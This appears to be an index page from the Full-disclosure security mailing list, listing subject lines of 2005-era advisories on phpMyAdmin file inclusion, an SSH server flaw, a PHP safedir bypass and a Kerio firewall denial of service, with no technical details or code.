[Full-disclosure] [ GLSA 200510-16 ] phpMyAdmin: Local file inclusion vulnerability

[Full-disclosure] [USN-208-1] SSH server vulnerability

[Full-disclosure] PHP Safedir Restriction Bypass Vulnerabilities

Re: [Full-disclosure] Kerio Personal Firewall and Kerio Server Firewall FWDRV driver Local Denial of Service

9 matches

Site Navigation

Mail list logo

Footer information